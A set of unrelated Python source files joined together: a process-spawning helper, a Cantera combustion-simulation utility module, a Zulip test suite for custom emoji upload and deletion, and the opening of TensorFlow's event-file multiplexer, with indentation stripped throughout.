_tls = threading.local()
def get_spawning_popen():
return getattr(_tls, 'spawning_popen', None)
def set_spawning_popen(popen):
_tls.spawning_popen = popen
def assert_spawning(obj):
if get_spawning_popen() is None:
raise RuntimeError(
'%s objects should only be shared between processes'
' through inheritance' % type(obj).__name__
)
|
|
# -*- coding: utf-8 -*-
import numpy as np
import cantera as ct
import pandas as pd
import re
import warnings
import copy
###################################
# 1a. system setup
###################################
def get_initial_mole_fractions(stoich_ratio,
fuel_mole_ratios,
oxygen_per_fuel_at_stoich_list,
fuels = None):
"""
this method obtains your initial mole fractions for fuel in air.
the product is returned as a dictionary with nitrogen, oxygen, and then
the fuels are listed.
stoich_ratio = oxygen to fuel stoichiometric ratio in the system
fuels = list of cantera fuel names for output dictionary. If ommitted, a list is returned
fuel_mole_ratios = list of molar ratios of various fuels (must sum to 1)
oxygen_per_fuel_at_stoic_list = a list containing the number of oxygen
molecules necessary for full combustion of each molecule. For
example, Methane would be 2.
"""
#errror check
np.testing.assert_allclose(sum(fuel_mole_ratios),1.)#,"mole ratios of fuels needs to add to one")
assert len(fuel_mole_ratios) ==len(oxygen_per_fuel_at_stoich_list)
combined_oxygen_per_fuel = np.sum(np.multiply(fuel_mole_ratios,oxygen_per_fuel_at_stoich_list))
total_fuel = sum(fuel_mole_ratios)
total_oxygen = total_fuel * combined_oxygen_per_fuel / stoich_ratio
total_nitrogen = total_oxygen * .79/.21
total_species = total_fuel + total_oxygen + total_nitrogen
mole_fractions = np.concatenate(([total_nitrogen, total_oxygen],fuel_mole_ratios),0)
normalized_mole_fractions = mole_fractions/total_species
if fuels:
fuel_zip = [(fuels[index],normalized_mole_fractions[index+2]) for index in range(len(fuels))]
air_zip = [('N2',normalized_mole_fractions[0]),('O2',normalized_mole_fractions[1])]
mole_fraction_dictionary = dict(air_zip+fuel_zip)
for species, fraction in list(mole_fraction_dictionary.items()):
if fraction < 1e-10:
del mole_fraction_dictionary[species]
return mole_fraction_dictionary
else:
return normalized_mole_fractions
def create_mechanism(full_model_file_path,kept_reaction_equations='all', remove_reaction_equations=None,
non_reactive_species = ['AR','N2','HE']):
"""
This is a convenience method for reducing mechanisms when reading cantera
files.
input the full model and a list of reaction equations that you'd like to keep
or a list of reaction equations to remove.
This method should retain or remove all instances of the reactions
returns a Cantera.Solution object of the mechanism with only the cooresponding
reactions and their species.
"""
desired_file = full_model_file_path
spec = ct.Species.listFromFile(desired_file)
rxns = ct.Reaction.listFromFile(desired_file)
if remove_reaction_equations is not None:
if isinstance(remove_reaction_equations,list):
rxn_index = 0
while rxn_index < len(rxns):
rxn_eq = rxns[rxn_index].equation
if rxn_eq in remove_reaction_equations:
del rxns[rxn_index]
else:
rxn_index += 1
reduced_species = eliminate_species_from_mechanism(spec,rxns,non_reactive_species)
return ct.Solution(thermo='IdealGas', kinetics='GasKinetics',
species=reduced_species, reactions=rxns)
else:
raise TypeError('remove reaction equations must be a list if specified. It is currently {}'.format(remove_reaction_equations))
if kept_reaction_equations=='all':
return ct.Solution(full_model_file_path)
else:
reduced_reactions = reduce_reactions_in_mechanism(rxns,kept_reaction_equations)
reduced_species = eliminate_species_from_mechanism(spec,reduced_reactions,non_reactive_species)
return ct.Solution(thermo='IdealGas', kinetics='GasKinetics',
species=reduced_species, reactions=reduced_reactions)
###################################
# 1b. mechanism reduction
###################################
def reduce_reactions_in_mechanism(reaction_list, kept_reaction_equations):
"""
finds reactions that match the form of the reaction equations in
kept_reaction_equations. It returns just the reactions that are meant
to be in the mechanism.
reaction_list = list of cantera Reaction objects
kept_reaction_equations = list of strings of reaction equations to keep.
This does not check for equations not in kept_reaction_equations. must be fixed
"""
reduced_reaction_list = []
found_reaction = np.full(len(kept_reaction_equations), False, dtype=bool)
for reaction in reaction_list:
if reaction.equation in kept_reaction_equations:
reduced_reaction_list.append(reaction)
found_reaction[kept_reaction_equations.index(reaction.equation)] = True
if not all(found_reaction):
reactions_missed = np.array(kept_reaction_equations)[~ found_reaction]
raise Exception('Reactions not found in solution or appear twice in the kept_reaction_list: ' + \
str(reactions_missed) + \
str())
return reduced_reaction_list
def eliminate_species_from_mechanism(species_list, kept_reactions,inert_species):
"""
finds all the species in kept_reactions, and returns a list of species
objects of those species. inert_species are automatically kept.
"""
reacting_species = []
for reaction in kept_reactions:
reacting_species += list(reaction.reactants.keys()) + list(reaction.products.keys())
# remove duplicates and add inert
reduced_species_name_list = list(set(reacting_species)) + inert_species
reduced_species_list = []
for species in species_list:
if species.name in reduced_species_name_list:
reduced_species_list.append(species)
return reduced_species_list
###################################
# 1c. run mechanism
###################################
def run_simulation(solution, times, conditions=None,
condition_type = 'adiabatic-constant-volume',
output_species = True,
output_reactions = True,
output_directional_reactions = False,
output_rop_roc = False,
atol = 1e-15,
rtol = 1e-9,
temperature_values=None):
"""
This method iterates through the cantera solution object and outputs information
about the simulation as a pandas.DataFrame object.
This method returns a dictionary with the reaction conditions data, species data,
net reaction data, forward/reverse reaction data, and the rate of production
and consumption (or `None` if a variable not specified).
`solution` = Cantera.Solution object
`conditions` = tuple of temperature, pressure, and mole fraction initial
species (will be deprecated. Set parameters before running)
`times` = an iterable of times which you would like to store information in
`condition_type` = string describing the run type
`output_species` = output a DataFrame of species' concentrations
`output_reactions` = output a DataFrame of net reaction rates
`output_directional_reactions` = output a DataFrame of directional reaction rates
`output_rop_roc` = output a DataFrame of species rates of consumption & production
condition_types supported
#########################
'adiabatic-constant-volume' - assumes no heat transfer and no volume change
'constant-temperature-and-pressure' - no solving energy equation or changing
rate constants
'constant-temperature-and-volume' - no solving energy equation but allows
for pressure to change with reactions
'specified-temperature-constant-volume' - the temperature profile specified
`temperature_values`, which corresponds to the
input `times`, alters the temperature right before
the next time step is taken. Constant volume is assumed.
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
elif condition_type == 'constant-temperature-and-pressure':
reactor = ct.IdealGasConstPressureReactor(solution, energy='off')
elif condition_type == 'constant-temperature-and-volume':
reactor = ct.IdealGasReactor(solution, energy='off')
elif condition_type == 'specified-temperature-constant-volume':
reactor = ct.IdealGasReactor(solution, energy='off')
if temperature_values is None:
raise AttributeError('Must specify temperature with `temperature_values` parameter')
elif len(times) != len(temperature_values):
raise AttributeError('`times` (len {0}) and `temperature_values` (len {1}) must have the same length.'.format(len(times),len(temperature_values)))
else:
supported_types = ['adiabatic-constant-volume','constant-temperature-and-pressure',
'constant-temperature-and-volume','specified-temperature-constant-volume']
raise NotImplementedError('only {0} are supported. {1} input'.format(supported_types, condition_type))
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
simulator.atol = atol
simulator.rtol = rtol
# setup data storage
outputs = {}
outputs['conditions'] = pd.DataFrame()
if output_species:
outputs['species'] = pd.DataFrame()
if output_reactions:
outputs['net_reactions'] = pd.DataFrame()
if output_directional_reactions:
outputs['directional_reactions'] = pd.DataFrame()
if output_rop_roc:
outputs['rop'] = pd.DataFrame()
for time_index, time in enumerate(times):
if condition_type == 'specified-temperature-constant-volume':
solution.TD = temperature_values[time_index], solution.density
reactor = ct.IdealGasReactor(solution, energy='off')
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
simulator.atol = atol
simulator.rtol = rtol
if time_index > 0:
simulator.set_initial_time(times[time_index-1])
simulator.advance(time)
# save data
outputs['conditions'] = outputs['conditions'].append(
get_conditions_series(simulator,reactor,solution),
ignore_index = True)
if output_species:
outputs['species'] = outputs['species'].append(
get_species_series(solution),
ignore_index = True)
if output_reactions:
outputs['net_reactions'] = outputs['net_reactions'].append(
get_reaction_series(solution),
ignore_index = True)
if output_directional_reactions:
outputs['directional_reactions'] = outputs['directional_reactions'].append(
get_forward_and_reverse_reactions_series(solution),
ignore_index = True)
if output_rop_roc:
outputs['rop'] = outputs['rop'].append(
get_rop_and_roc_series(solution),
ignore_index = True)
# set indexes as time
time_vector = outputs['conditions']['time (s)']
for output in outputs.values():
output.set_index(time_vector,inplace=True)
return outputs
def run_simulation_till_conversion(solution, species, conversion,conditions=None,
condition_type = 'adiabatic-constant-volume',
output_species = True,
output_reactions = True,
output_directional_reactions = False,
output_rop_roc = False,
skip_data = 150,
atol = 1e-15,
rtol = 1e-9,):
"""
This method iterates through the cantera solution object and outputs information
about the simulation as a pandas.DataFrame object.
This method returns a dictionary with the reaction conditions data, species data,
net reaction data, forward/reverse reaction data, and the rate of production
and consumption (or `None` if a variable not specified) at the specified conversion value.
`solution` = Cantera.Solution object
`conditions` = tuple of temperature, pressure, and mole fraction initial
species
`species` = a string of the species label (or list of strings) to be used in conversion calculations
`conversion` = a float of the fraction conversion to stop the simulation at
`condition_type` = string describing the run type, currently supports
'adiabatic-constant-volume' and 'constant-temperature-and-pressure'
`output_species` = output a Series of species' concentrations
`output_reactions` = output a Series of net reaction rates
`output_directional_reactions` = output a Series of directional reaction rates
`output_rop_roc` = output a DataFrame of species rates of consumption & production
`skip_data` = an integer which reduces storing each point of data.
storage space scales as 1/`skip_data`
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
if condition_type == 'constant-temperature-and-pressure':
reactor = ct.IdealGasConstPressureReactor(solution, energy='off')
else:
raise NotImplementedError('only adiabatic constant volume is supported')
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
simulator.atol = atol
simulator.rtol = rtol
# setup data storage
outputs = {}
outputs['conditions'] = pd.DataFrame()
if output_species:
outputs['species'] = pd.DataFrame()
if output_reactions:
outputs['net_reactions'] = pd.DataFrame()
if output_directional_reactions:
outputs['directional_reactions'] = pd.DataFrame()
if output_rop_roc:
outputs['rop'] = pd.DataFrame()
if isinstance(species,str):
target_species_indexes = [solution.species_index(species)]
else: # must be a list or tuple
target_species_indexes = [solution.species_index(s) for s in species]
starting_concentration = sum([solution.concentrations[target_species_index] for target_species_index in target_species_indexes])
proper_conversion = False
new_conversion = 0
skip_count = 1e8
while not proper_conversion:
error_count = 0
while error_count >= 0:
try:
simulator.step()
error_count = -1
except:
error_count += 1
if error_count > 10:
print('Might not be possible to achieve conversion at T={0}, P={1}, with concentrations of {2} obtaining a conversion of {3} at time {4} s.'.format(solution.T,solution.P,zip(solution.species_names,solution.X), new_conversion,simulator.time))
raise
new_conversion = 1-sum([solution.concentrations[target_species_index] for target_species_index in target_species_indexes])/starting_concentration
if new_conversion > conversion:
proper_conversion = True
# save data
if skip_count > skip_data or proper_conversion:
skip_count = 0
outputs['conditions'] = outputs['conditions'].append(
get_conditions_series(simulator,reactor,solution),
ignore_index = True)
if output_species:
outputs['species'] = outputs['species'].append(
get_species_series(solution),
ignore_index = True)
if output_reactions:
outputs['net_reactions'] = outputs['net_reactions'].append(
get_reaction_series(solution),
ignore_index = True)
if output_directional_reactions:
outputs['directional_reactions'] = outputs['directional_reactions'].append(
get_forward_and_reverse_reactions_series(solution),
ignore_index = True)
if output_rop_roc:
outputs['rop'] = outputs['rop'].append(
get_rop_and_roc_series(solution),
ignore_index = True)
skip_count += 1
# set indexes as time
time_vector = outputs['conditions']['time (s)']
for output in outputs.values():
output.set_index(time_vector,inplace=True)
return outputs
def find_ignition_delay(solution, conditions=None,
condition_type = 'adiabatic-constant-volume',
output_profile = False,
output_species = True,
output_reactions = True,
output_directional_reactions = False,
output_rop_roc = False,
temp_final = 965,
time_final = 1000,
skip_data = 150,):
"""
This method finds the ignition delay of a cantera solution object with
an option to return all species and reactions as a pandas.DataFrame object
which can be stored.
The method calculates ignition delay by going until the temperature is near
`temp_final`, and then it locates the maximum change in temperature with
time, $\frac{\delta T}{\delta t}$. The time value corresponding with the max
is the ignition delay
This method returns a tuple with ignition delay and the species and
reaction data, and the rate of production and consumption (or `None`
if not specified).
`solution` = Cantera.Solution object
`conditions` = tuple of temperature, pressure, and mole fraction initial species
`condition_type` = string describing the run type, currently only 'adiabatic-constant-volume' supported
`output_profile` = should the program save simulation results and output them (True),
or should it just give the ignition delay (False)
`output_species` = output a Series of species' concentrations
`output_reactions` = output a Series of net reaction rates
`output_directional_reactions` = output a Series of directional reaction rates
`output_rop_roc` = output a DataFrame of species rates of consumption & production
`temp_final` = the temperature which the ignition is reported
`time_final` = the time to cut off the simulation if the temperature never
reaches `temp_final`
`skip_data` = an integer which reduces storing each point of data.
storage space scales as 1/`skip_data`
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
else:
raise NotImplementedError('only adiabatic constant volume is supported')
# setup data storage
outputs = {}
if output_profile:
outputs['conditions'] = pd.DataFrame()
if output_species:
outputs['species'] = pd.DataFrame()
if output_reactions:
outputs['net_reactions'] = pd.DataFrame()
if output_directional_reactions:
outputs['directional_reactions'] = pd.DataFrame()
if output_rop_roc:
outputs['rop'] = pd.DataFrame()
# run simulation
max_time = time_final
old_time = -1
old_temp = reactor.T
max_dTdt = 0
max_dTdt_time = 0
data_storage = 1e8 # large number to ensure first data point taken
while simulator.time < time_final:
simulator.step()
if data_storage > skip_data:
data_storage = 1
if time_final == max_time and reactor.T > temp_final:
time_final = simulator.time * 1.01 # go just beyond the final temperature
if output_profile:
outputs['conditions'] = outputs['conditions'].append(
get_conditions_series(simulator,reactor,solution),
ignore_index = True)
if output_species:
outputs['species'] = outputs['species'].append(
get_species_series(solution),
ignore_index = True)
if output_reactions:
outputs['net_reactions'] = outputs['net_reactions'].append(
get_reaction_series(solution),
ignore_index = True)
if output_directional_reactions:
outputs['directional_reactions'] = outputs['directional_reactions'].append(
get_forward_and_reverse_reactions_series(solution),
ignore_index = True)
if output_rop_roc:
outputs['rop'] = outputs['rop'].append(
get_rop_and_roc_series(solution),
ignore_index = True)
# find ignition delay
dTdt = (reactor.T - old_temp) / (simulator.time - old_time)
if dTdt > max_dTdt:
max_dTdt = dTdt
max_dTdt_time = simulator.time
old_temp = reactor.T
old_time = simulator.time
data_storage += 1
# set indexes as time
if output_profile:
time_vector = outputs['conditions']['time (s)']
for output in outputs.values():
output.set_index(time_vector,inplace=True)
# save ignition_delay
outputs['ignition_delay'] = max_dTdt_time
return outputs
def save_flux_diagrams(solution, times, conditions=None,
condition_type = 'adiabatic-constant-volume',
path = '.', element = 'C', filename= 'flux_diagram',
filetype = 'png'):
"""
This method is similar to run_simulation but it saves reaction path
diagrams instead of returning objects.
"""
if conditions is not None:
solution.TPX = conditions
if condition_type == 'adiabatic-constant-volume':
reactor = ct.IdealGasReactor(solution)
elif condition_type == 'constant-temperature-and-pressure':
reactor = ct.IdealGasConstPressureReactor(solution, energy='off')
else:
raise NotImplementedError('only "adiabatic-constant-volume" or "constant-temperature-and-pressure" is supported. {} input'.format(condition_type))
simulator = ct.ReactorNet([reactor])
solution = reactor.kinetics
for time in times:
simulator.advance(time)
save_flux_diagram(solution,filename=filename+'_{:.2e}s'.format(simulator.time),
path = path, element=element, filetype = filetype)
###################################
# 1d. saving data helper methods
###################################
def get_data_series(simulator,solution, basics= ['time','temperature','pressure','density'],
add_species = True, species_names='all',
add_rxns = False, reaction_names='all'):
"""
a wrapper function of `get_conditions_series`, `get_species_series`, and
`get_reaction_series`, which may be depreciated in the future.
Deprecated
"""
conditions = get_conditions_series(simulator,solution, basics)
if add_species:
species_series = get_species_series(solution, species_names)
conditions = pd.concat([conditions,species_series])
if add_rxns:
rxn_series = get_reaction_series(solution, reaction_names)
conditions = pd.concat([conditions,rxn_series])
return conditions
def get_conditions_series(simulator, reactor, solution,
basics= ['time','temperature','pressure','density','volume','enthalpy','internal energy']):
"""
returns the current conditions of a Solution object contianing ReactorNet
object (simulator) as a pd.Series.
simulator = the ReactorNet object of the simulation
solution = solution object to pull values from
basics =a list of state variables to save
The following are enabled for the conditions:
* time
* temperature
* pressure
* density
* volume
* cp (constant pressure heat capacity)
* cv (constant volume heat capacity)
* enthalpy
"""
conditions = pd.Series()
# add regular conditions
if 'time' in basics:
conditions['time (s)'] = simulator.time
if 'temperature' in basics:
conditions['temperature (K)'] = solution.T
if 'pressure' in basics:
conditions['pressure (Pa)'] = solution.P
if 'density' in basics:
conditions['density (kmol/m3)'] = solution.density_mole
if 'volume' in basics:
conditions['volume (m3)'] = reactor.volume
if 'cp' in basics:
conditions['heat capacity, cp (J/kmol/K)'] = solution.cp_mole
if 'cv' in basics:
conditions['heat capacity, cv (J/kmol/K)'] = solution.cv_mole
if 'enthalpy' in basics:
conditions['enthalpy (J/kg)'] = solution.enthalpy_mass
if 'internal energy' in basics:
conditions['internal energy (J/kg)'] = solution.int_energy_mass
return conditions
def get_species_series(solution, species_names = 'all'):
"""
returns a pandas.Series of the desired species' concentrations
solution = the cantera.Solution object for the simulation
species_names = list of species names to be saved (default is all)
"""
series = pd.Series()
if species_names=='all':
species_recorded = solution.species_names
else:
species_recorded = species_names
mole_fractions = solution.mole_fraction_dict()
for name in species_recorded:
try:
series[name] = mole_fractions[name] * solution.density_mole
except KeyError:
series[name] = 0
# sends warning if user typed species incorrectly
if name not in solution.species_names:
warnings.warn('{} is not listed in the mole fraction dictionary and may be mispelled.'.format(name))
return series
def get_reaction_series(solution, reaction_names = 'all'):
"""
returns a pandas.Series of the desired reactions' net rates
solution = the cantera.Solution object for the simulation
species_names = list of reaction names to be saved (default is all)
"""
series = pd.Series()
if reaction_names=='all':
reaction_names = solution.reaction_equations()
reaction_rates = __get_rxn_rate_dict(solution.reaction_equations(),solution.net_rates_of_progress)
for name in reaction_names:
try:
series[name] = reaction_rates[name]
except KeyError:
series[name] = 0
warnings.warn('{} is not listed in the reaction names.'.format(name))
return series
def get_forward_and_reverse_reactions_series(solution):
"""
This method returns a series of the forward and reverse reactions
"""
reaction_equations = solution.reaction_equations()
forward_reactions = pd.Series(__get_rxn_rate_dict(reaction_equations,solution.forward_rates_of_progress))
reverse_reactions = pd.Series(__get_rxn_rate_dict(reaction_equations,solution.reverse_rates_of_progress))
forward_reactions.index = pd.MultiIndex.from_product([['forward'],forward_reactions.index], names = ['direction','reaction'])
reverse_reactions.index = pd.MultiIndex.from_product([['reverse'],reverse_reactions.index], names = ['direction','reaction'])
return pd.concat([forward_reactions,reverse_reactions])
def get_rop_and_roc_series(solution):
"""
returns rate of production and rate of consumption to dataframe (kmol/m3s)
This data is primarily useful for quasi-steady state analysis
"""
species = solution.species_names
production = pd.Series(__get_rxn_rate_dict(species,solution.creation_rates))
consumption = pd.Series(__get_rxn_rate_dict(species,solution.destruction_rates))
assert isinstance(production.index,pd.Index)
assert isinstance(consumption.index,pd.Index)
production.index = pd.MultiIndex.from_product([['production'],production.index])
consumption.index = pd.MultiIndex.from_product([['consumption'],consumption.index])
return pd.concat([production,consumption])
def __get_rxn_rate_dict(reaction_equations, net_rates):
"""
makes a dictionary out of the two inputs. If identical reactions are encountered,
called duplicates in Cantera, the method will merge them and sum the rate together
"""
rxn_dict = {}
for equation, rate in zip(reaction_equations, net_rates):
try:
rxn_dict[equation] += rate
except KeyError:
rxn_dict[equation] = rate
return rxn_dict
def save_flux_diagram(kinetics, path = '.', element = 'C', filename= 'flux_diagram',
filetype = 'png'):
"""
makes a flux diagram and saves it to the designated file.
kinetics is a solution object
path is the path to the designated storage
element is the element to be traced. Isotopes can also count
filename is the filename to store it as
filetype is the type to store the file as (any availalbe from http://graphviz.org/doc/info/output.html)
"""
import os
diagram = ct.ReactionPathDiagram(kinetics, element)
diagram.label_threshold = 0.00001
dot_file = 'temp.dot'
img_file = filename + '.' + filetype
img_path = os.path.join(path, img_file)
diagram.write_dot(dot_file)
error = os.system('dot {0} -T{2} -o{1} -Gdpi=200'.format(dot_file, img_path,filetype))
if error:
raise OSError('dot was not able to create the desired image. error number: {}. Do you have graphviz installed'.format(error))
else:
print("Wrote graphviz output file to '{0}'.".format(img_path))
os.remove(dot_file)
|
|
# -*- coding: utf-8 -*-
import mock
from zerver.lib.actions import do_create_realm, do_create_user, \
check_add_realm_emoji
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import get_test_image_file
from zerver.models import Realm, RealmEmoji, UserProfile, get_realm
class RealmEmojiTest(ZulipTestCase):
def create_test_emoji(self, name: str, author: UserProfile) -> RealmEmoji:
with get_test_image_file('img.png') as img_file:
realm_emoji = check_add_realm_emoji(realm=author.realm,
name=name,
author=author,
image_file=img_file)
if realm_emoji is None:
raise Exception("Error creating test emoji.") # nocoverage
return realm_emoji
def create_test_emoji_with_no_author(self, name: str, realm: Realm) -> RealmEmoji:
realm_emoji = RealmEmoji.objects.create(realm=realm, name=name)
return realm_emoji
def test_list(self) -> None:
emoji_author = self.example_user('iago')
self.login(emoji_author.email)
self.create_test_emoji('my_emoji', emoji_author)
result = self.client_get("/json/realm/emoji")
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
self.assertEqual(len(result.json()["emoji"]), 2)
def test_list_no_author(self) -> None:
email = self.example_email('iago')
self.login(email)
realm = get_realm('zulip')
realm_emoji = self.create_test_emoji_with_no_author('my_emoji', realm)
result = self.client_get("/json/realm/emoji")
self.assert_json_success(result)
content = result.json()
self.assertEqual(len(content["emoji"]), 2)
test_emoji = content["emoji"][str(realm_emoji.id)]
self.assertIsNone(test_emoji['author'])
def test_list_admins_only(self) -> None:
# Test that realm emoji list is public and realm emojis
# having no author are also there in the list.
email = self.example_email('othello')
self.login(email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = True
realm.save()
realm_emoji = self.create_test_emoji_with_no_author('my_emoji', realm)
result = self.client_get("/json/realm/emoji")
self.assert_json_success(result)
content = result.json()
self.assertEqual(len(content["emoji"]), 2)
test_emoji = content["emoji"][str(realm_emoji.id)]
self.assertIsNone(test_emoji['author'])
def test_upload(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
realm_emoji = RealmEmoji.objects.get(name="my_emoji")
self.assertEqual(realm_emoji.author.email, email)
result = self.client_get("/json/realm/emoji")
content = result.json()
self.assert_json_success(result)
self.assertEqual(len(content["emoji"]), 2)
test_emoji = content["emoji"][str(realm_emoji.id)]
self.assertIn('author', test_emoji)
self.assertEqual(test_emoji['author']['email'], email)
def test_realm_emoji_repr(self) -> None:
realm_emoji = RealmEmoji.objects.get(name='green_tick')
file_name = str(realm_emoji.id) + '.png'
self.assertEqual(
str(realm_emoji),
'<RealmEmoji(zulip): %s green_tick False %s>' % (realm_emoji.id, file_name)
)
def test_upload_exception(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_em*oji', info=emoji_data)
self.assert_json_error(result, 'Invalid characters in emoji name')
def test_upload_uppercase_exception(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_EMoji', info=emoji_data)
self.assert_json_error(result, 'Invalid characters in emoji name')
def test_upload_admins_only(self) -> None:
email = self.example_email('othello')
self.login(email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = True
realm.save()
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_error(result, 'Must be an organization administrator')
def test_upload_anyone(self) -> None:
email = self.example_email('othello')
self.login(email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = False
realm.save()
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
def test_emoji_upload_by_guest_user(self) -> None:
email = self.example_email('polonius')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_error(result, 'Not allowed for guest users')
def test_delete(self) -> None:
emoji_author = self.example_user('iago')
self.login(emoji_author.email)
realm_emoji = self.create_test_emoji('my_emoji', emoji_author)
result = self.client_delete('/json/realm/emoji/my_emoji')
self.assert_json_success(result)
result = self.client_get("/json/realm/emoji")
emojis = result.json()["emoji"]
self.assert_json_success(result)
# We only mark an emoji as deactivated instead of
# removing it from the database.
self.assertEqual(len(emojis), 2)
test_emoji = emojis[str(realm_emoji.id)]
self.assertEqual(test_emoji["deactivated"], True)
def test_delete_no_author(self) -> None:
email = self.example_email('iago')
self.login(email)
realm = get_realm('zulip')
self.create_test_emoji_with_no_author('my_emoji', realm)
result = self.client_delete('/json/realm/emoji/my_emoji')
self.assert_json_success(result)
def test_delete_admins_only(self) -> None:
emoji_author = self.example_user('othello')
self.login(emoji_author.email)
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = True
realm.save()
self.create_test_emoji_with_no_author("my_emoji", realm)
result = self.client_delete("/json/realm/emoji/my_emoji")
self.assert_json_error(result, 'Must be an organization administrator')
def test_delete_admin_or_author(self) -> None:
# If any user in a realm can upload the emoji then the user who
# uploaded it as well as the admin should be able to delete it.
emoji_author = self.example_user('othello')
realm = get_realm('zulip')
realm.add_emoji_by_admins_only = False
realm.save()
self.create_test_emoji('my_emoji_1', emoji_author)
self.login(emoji_author.email)
result = self.client_delete("/json/realm/emoji/my_emoji_1")
self.assert_json_success(result)
self.logout()
self.create_test_emoji('my_emoji_2', emoji_author)
self.login(self.example_email('iago'))
result = self.client_delete("/json/realm/emoji/my_emoji_2")
self.assert_json_success(result)
self.logout()
self.create_test_emoji('my_emoji_3', emoji_author)
self.login(self.example_email('cordelia'))
result = self.client_delete("/json/realm/emoji/my_emoji_3")
self.assert_json_error(result, 'Must be an organization administrator or emoji author')
def test_delete_exception(self) -> None:
email = self.example_email('iago')
self.login(email)
result = self.client_delete("/json/realm/emoji/invalid_emoji")
self.assert_json_error(result, "Emoji 'invalid_emoji' does not exist")
def test_multiple_upload(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1, get_test_image_file('img.png') as fp2:
result = self.client_post('/json/realm/emoji/my_emoji', {'f1': fp1, 'f2': fp2})
self.assert_json_error(result, 'You must upload exactly one file.')
def test_emoji_upload_file_size_error(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp:
with self.settings(MAX_EMOJI_FILE_SIZE=0):
result = self.client_post('/json/realm/emoji/my_emoji', {'file': fp})
self.assert_json_error(result, 'Uploaded file is larger than the allowed limit of 0 MB')
def test_upload_already_existed_emoji(self) -> None:
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/green_tick', info=emoji_data)
self.assert_json_error(result, 'A custom emoji with this name already exists.')
def test_reupload(self) -> None:
# An user should be able to reupload an emoji with same name.
email = self.example_email('iago')
self.login(email)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
result = self.client_delete("/json/realm/emoji/my_emoji")
self.assert_json_success(result)
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_success(result)
result = self.client_get("/json/realm/emoji")
emojis = result.json()["emoji"]
self.assert_json_success(result)
self.assertEqual(len(emojis), 3)
def test_failed_file_upload(self) -> None:
email = self.example_email('iago')
self.login(email)
with mock.patch('zerver.lib.upload.write_local_file', side_effect=Exception()):
with get_test_image_file('img.png') as fp1:
emoji_data = {'f1': fp1}
result = self.client_post('/json/realm/emoji/my_emoji', info=emoji_data)
self.assert_json_error(result, "Image file upload failed.")
def test_check_admin_realm_emoji(self) -> None:
# Test that an user A is able to remove a realm emoji uploaded by him
# and having same name as a deactivated realm emoji uploaded by some
# other user B.
emoji_author_1 = self.example_user('cordelia')
self.create_test_emoji('test_emoji', emoji_author_1)
self.login(emoji_author_1.email)
result = self.client_delete('/json/realm/emoji/test_emoji')
self.assert_json_success(result)
emoji_author_2 = self.example_user('othello')
self.create_test_emoji('test_emoji', emoji_author_2)
self.login(emoji_author_2.email)
result = self.client_delete('/json/realm/emoji/test_emoji')
self.assert_json_success(result)
def test_check_admin_different_realm_emoji(self) -> None:
# Test that two different realm emojis in two different realms but
# having same name can be administered independently.
realm_1 = do_create_realm('test_realm', 'test_realm')
emoji_author_1 = do_create_user('[email protected]',
password='abc',
realm=realm_1,
full_name='abc',
short_name='abc')
self.create_test_emoji('test_emoji', emoji_author_1)
emoji_author_2 = self.example_user('othello')
self.create_test_emoji('test_emoji', emoji_author_2)
self.login(emoji_author_2.email)
result = self.client_delete('/json/realm/emoji/test_emoji')
self.assert_json_success(result)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides an interface for working with multiple event files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import six
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import directory_watcher
from tensorflow.python.summary.impl import io_wrapper
class EventMultiplexer(object):
"""An `EventMultiplexer` manages access to multiple `EventAccumulator`s.
Each `EventAccumulator` is associated with a `run`, which is a self-contained
